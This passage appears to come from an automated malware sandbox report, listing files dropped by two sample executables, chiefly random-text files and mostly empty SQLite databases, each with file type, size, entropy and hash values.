                                                                                                                                                Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1026
                                                                                                                                                Entropy (8bit):4.692693183518806
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1026
                                                                                                                                                Entropy (8bit):4.699548026888946
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1026
                                                                                                                                                Entropy (8bit):4.695685570184741
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):49152
                                                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):98304
                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):98304
                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe
